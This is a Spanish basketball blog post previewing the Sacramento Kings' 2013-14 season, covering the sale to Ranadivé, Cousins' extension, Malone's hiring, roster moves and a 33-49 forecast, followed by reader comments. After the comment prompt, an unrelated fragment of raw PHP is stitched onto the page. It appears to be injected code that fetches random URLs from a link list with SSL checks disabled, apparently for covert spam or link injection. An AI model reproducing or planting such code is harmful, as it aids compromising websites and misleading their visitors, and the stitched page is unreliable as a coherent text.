Sacramento Kings: De los Maloof a los Malone

07 de October de 2013 por Sancho88
Durante los últimos tres años este análisis era una despedida, la última copa antes del adiós definitivo. Son incontables las veces en las que todo parecía hundirse por el retrete y también las veces en las que alguien hacía un pequeño milagro que prorrogaba un año más el sufrimiento. Al final la margarita se deshojó positivamente y la NBA declaró  su amor a los Sacramento Kings tras muchos meses y años de sufrimiento en la capital californiana. El 17 de mayo se hacía oficial la venta del equipo al empresario indio Vivek Ranadivé tras la votación de los dueños de la liga para vetar el traslado de la franquicia a Seattle. Los 22 votos a favor por solo 8 en contra dejaron clara la postura de la NBA, por lo que ya no habrá más intentos de fuga de la familia Maloof a ningún sitio. Los Kings se quedan en Sacramento por 535 millones, cifra récord hasta la fecha en la venta de un equipo de la NBA.

En la agenda a corto plazo está la construcción de un nuevo estadio valorado en 250 millones para que campe allí a sus anchas el díscolo DeMarcus Cousins. El mes de octubre tiene su sello, pues es la fecha en la que el pívot de Alabama ha firmado la extensión de su contrato por 4 años más a razón de 15,5 millones por temporada (62 en total). Así, Cousins se convierte en el tercer jugador de la promoción de 2010 en firmar por el máximo tras su compañero en los Wildcats John Wall y el alero de los Pacers Paul George. De todas maneras, su contrato no será por 5 años, pero tampoco deja vías abiertas para la rescisión por parte del jugador ni de la franquicia. Esto asegura la unión de los Kings y de su jugador franquicia hasta 2018. Una apuesta arriesgada para muchos, pero al menos una apuesta en un equipo yermo de esperanza desde la salida de los Bibby, Stojakovic, Ron Artest, etc. 

Otro de los protagonistas de la nueva temporada en Sacramento es, paradójicamente, una persona ‘non grata’ en el Arco Arena. Hablamos de Shaquille O’Neal, nuevo dueño de un pequeño paquete accionarial de los Kings. Suena un poco a extravagancia de Shaq, un movimiento más de odio eterno a los Lakers desde su salida en 2004. Entre los aficionados morados siempre quedará la ‘pupa’ de las finales de conferencia de 2002, y unas declaraciones polémicas que calaron hondo. Por eso ronda la mosca detrás de la oreja de momento, sobre todo porque O’Neal se divierte haciendo este tipo de cosas. No obstante, a pesar de ser una provocación en toda regla, se dice que ha sido la clave para la renovación de Cousins, y, por tanto, bienvenida sea la provocación. Ambos han trabajado juntos este verano, no tanto en la pista, sino en conversaciones en las que O’Neal hacía de hermano mayor de Cousins.

Todo esto con el objetivo de centrar la cabeza del muchacho. Ya son 23 años a su espalda y dos entrenadores enterrados en la caja de pino por su actitud. Seguramente algo de lo que habrán hablado Shaquille y Cousins largo y tendido. El nuevo inquilino de los banquillos se llama Mike Malone, tiene 42 años, y fue asistente de Mark Jackson en el banquillo de los Warriors durante dos temporadas. Llega abalado por el equipo de trabajo del dueño Ranadivé y por el nuevo General Manager Pete D’Alessandro, ambos también vinculados recientemente con el equipo de la Bahía. Además, en las oficinas trabajará otro ex ilustre de los Warriors como es Chris Mullin, quien será la mano derecha de D’Alessandro en los despachos. Y para cerrar el círculo, Malone se trae a su padre Brendan como consejero en los banquillos, un viejo lobo marino que ya fue entrenador principal en Toronto y Cleveland, y a sus 71 años de edad lleva más de 40 años en los banquillos, donde destacó sobremanera preparando la defensa sobre Michael Jordan en los dos títulos de los ‘Bad Boys’ de Detroit en los albores de los años 80. Sin duda, tiene mejor pinta a nivel deportivo este nuevo proyecto ejemplificado en dos hombres que han mamado el baloncesto defensivo como son Malone padre y Malone hijo, que el desastre hacia ninguna parte de los jugadores del Monopoly en Las Vegas, los hermanos Maloof.

Todo esto supone el desembarco desde Golden State de un montón de piezas estratégicas que van a intentar trabajar en Sacramento aplicando un modelo parecido al de los Warriors que reporte éxitos a Sacramento en el medio plazo. Y de momento el balance de la gestión es positivo, aunque también hay algún que otro borrón. De entrada no podían ofrecerle a Evans el dineral que ha sacado en los Pelicans. Los 44 millones de su nuevo contrato se guardaron con buen criterio para la renovación de Cousins. Punto a favor clarísimo para los nuevos dirigentes. Hubieran podido llegar a 40 millones incluso, quizá algo menos, pero nunca a 11 por temporada por un jugador que no mostró compromiso alguno con la franquicia desde su temporada del ROY. Además, en la noche del draft previa a las subastas del mes de julio D’Alessandro fue uno de los GM más felices y se cubrió las espaldas trazando el plan futuro. Ben McLemore, el escolta estrella de los Jayhawks de Kansas, se hundió hasta la séptima elección del draft y recaló en los Kings. Con él en el equipo no tenía sentido seguir contando con Evans y los mandos del equipo pasaban definitivamente a manos de Cousins.

Sea como fuere que su actuación en Las Vegas fue bastante desconcertante, lo cierto es que el proyecto de futuro que supone McLemore mejora bastante al de Evans y además es mucho más barato. Para rematar la jugada, los Kings consiguieron al base de los Pelicans Greivis Vasquez a cambio del Sign and Trade de Tyreke. Una jugada maestra que pudo terminar incluso mejor si hubiera llegado Robin López además de Vásquez, pero que en el cómputo global parece beneficiosa para Sacramento.

Sobre estos tres jugadores pivotará el proyecto de la nueva temporada. Cousins, McLemore y Vasquez están obligados a llevar al equipo a 30 victorias o más, un reto para una ciudad deprimida en lo deportivo en las últimas temporadas. Pero lo cierto es que no hay mucho más en la plantilla para pelear en una Conferencia Oeste que ya no es salvaje, ni selvática, sino el imperio de Jumanji, un desafío imposible para estos Kings.

Cierto es que el ‘backourt’  tiene cierto nivel, y que habrá competencia por seguir disfrutando de un juego fluido en ataque. Isaiah Thomas ve relegada su posición de titular a salir desde el banquillo, por lo que el equipo se asegura en todo momento repartir balones para Cousins y McLemore. Él y Vásquez serán un buen dúo de directores para el equipo. Marcus Thornton seguirá saliendo con la metralleta para tirarse hasta las zapatillas desde la segunda unidad y Jimmer Fredette seguirá arrastrando su culo de basket Fiba un año más por una liga que no le pertenece. La sorpresa entre los pequeños será con muchísima seguridad Ray McCallum. El pequeño director de la universidad de Detroit tiene pinta de tirar muchas puertas en su año de rookie. Una segunda ronda que por ‘hype’ puede hacer las delicias en el rebautizado Sleep Train Arena.

En las alas y en el juego interior es donde no se han hecho los deberes y por eso el equipo no va a aspirar a los Playoffs. El intento de fichar a Andre Iguodala fue lamentable, con una oferta de 52 millones por 4 años sobre la mesa que se retiró la misma tarde de salir a la luz solamente porque el jugador quería escuchar a más equipos. Fue un movimiento desesperado y lanzó un mensaje muy negativo sobre los despachos de los Kings, que si bien se habían movido con cabeza en el traspaso de Evans, esta vez dispararon a la nada con balas de fogueo. Además, en la lista de desplantes, no pudieron firmar ningún hombre grande, ni a Greg Oden ni siquiera a Timofey Mozgov, y su proyecto de alero titular se llama Luc Mbah a Moute. Así que por una parte han garantizado tres piezas de futuro con Cousins, McLemore y Vásquez, pero por otra parte el resto del equipo, exceptuando Thomas, McCallum y quizá Carl Landry, no llevarán a los Kings a cotas mayores. Aunque si el resultado final es llevarse a la joya de la corona Andrew Wiggins, o a alguno de sus subalternos en el próximo draft como Jabari Parker, Julius Randle, Marcus Smart o Dante Exum, bienvenido sea el ‘tanking’, por supuesto.

Seguramente a lo largo del año veamos algunos traspasos con jugadores de último año como John Salmons, Patrick Patterson, Jimmer Fredette o el propio Isaiah Thomas. Se trata de limpiar el equipo salarialmente y continuar un año más con la reconstrucción. Y ya llevan prácticamente una década. Ahora bien, el rumbo parece cambiar por fin.

Quinteto: Greivis Vásquez, Ben McLemore, Mbah a Moute, Carl Landry, DeMarcus Cousins
6º hombre: Isaiah Thomas / Jason Thompson

Altas: Carl Landry (Golden State Warriors), Luc Mbah a Moute (Milwaukee Bucks), Greivis Vásquez (New Orleans Pelicans), Ben McLemore (R- Kansas Jayhawks), Ray McCallum (R-Detroit Mercy), Mike Malone (Coach), Pete D’Alessandro (General Manager).

Bajas: Tyreke Evans (New Orleans Pelicans), James Johnson (Atlanta Hawks), Toney Douglas (Golden State Warriors), Cole Aldrich (New York Knicks), Keith Smart (Coach), Geoff Petrie (General Manager).

Pronóstico: 33-49. Últimos o penúltimos de conferencia.

Comenta

8 comentarios a esta entrada

  1. Denise dice:
    #1

    Yo los veo antepenultimos pero tienen el mejor equipo de los ultimos 5 años, lo que pasa es que el Oeste está muy chungo este año.
    Mis dudas vienen con McLemore que a dia de hoy creo que lo mas que puede aspirar es a ser un Nick Young de éstos con capacidad de meter 25 puntos en determinados dias y después estar 3 partidos tirandose las zapatillas.
    ¿No crees que Thornton debe tener un papel mas importante en este equipo? Debería ser la referencia exterior del equipo..
    El puesto de SF si está bastante mal cubierto, que pena lo de Travis Outlaw, en aquellos Blazers de la epoca del Chacho, Outlaw era un jugador que me encantaba y ahora es un fantasma sobre la pista, una bazofia deambulante.

      Citar

  2. Esteban dice:
    #2

    Mbah a Moute? ok, es fuyerte y puede defender pero esta en condiciones de pelear por ser el peor titular de la liga

      Citar

  3. Simon dice:
    #3

    Esteban:
    Mbah a Moute? ok, es fuyerte y puede defender pero esta en condiciones de pelear por ser el peor titular de la liga

    Txusma no aprueba ese comentario.

      Citar

  4. Esteban dice:
    #4

    Una pena que no valoren la capacidad anoadoa de thorton, ni los kings ni nadie de la liga

      Citar

  5. rumbero dice:
    #5

    Es que ese puesto de alero debe ser de los peores cubiertos de toda la NBA. A malas siempre estan a tiempo de darle un dorsal al nuevo asesor http://www.youtube.com/watch?v=uW728Zm6gcY

    El resto a es un equipo que está bastante bien. Buena dupla en la dirección de juego, Landry-Thompson-Patterson acompañando a Cousins no está mal y ganas de ver a McLemore y McCallum. Yo creo que el primero puede ser algo más que un buen tirador. Por físico y capacidades debe ser un jugador mucho más completo, esperemos que no lo encasillen como lo primero.

      Citar

  6. txusma dice:
    #6

    Hay dos jugadores de la liga que están protegidos: Mbah-a-Moute y Scott Machado. Cuidadín con lo que decís…
    Si juega Thorton y me ha de defender a mí, a lo mejor ese día me salgo y todo.

      Citar

  7. Sancho88 dice:
    #7

    Por eso digo lo de la metralleta.

      Citar

  8. Sancho88 dice:
    #8

    Si hay un jugador unidimensional en la liga este es Marcus Thornton. No tiene ni idea de defender ni de pasar al compañero, solo sabe pegárselas desde lejos. Creo que está claro que McLemore es mucho más jugador y debería ser titular. El quinteto que pone ayer Malone está puesto por salarios y veteranía, no por merecimientos. Y ojo, yo critico que Mbah a Moute sea el alero titular, pero es lo mejor que pueden poner. Salmons da muchísima pena y al menos el camerunés es un gran defensor. Thomas no tiene nivel de base titular, soba demasiado la bola. Vásquez le va a venir bien a este equipo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>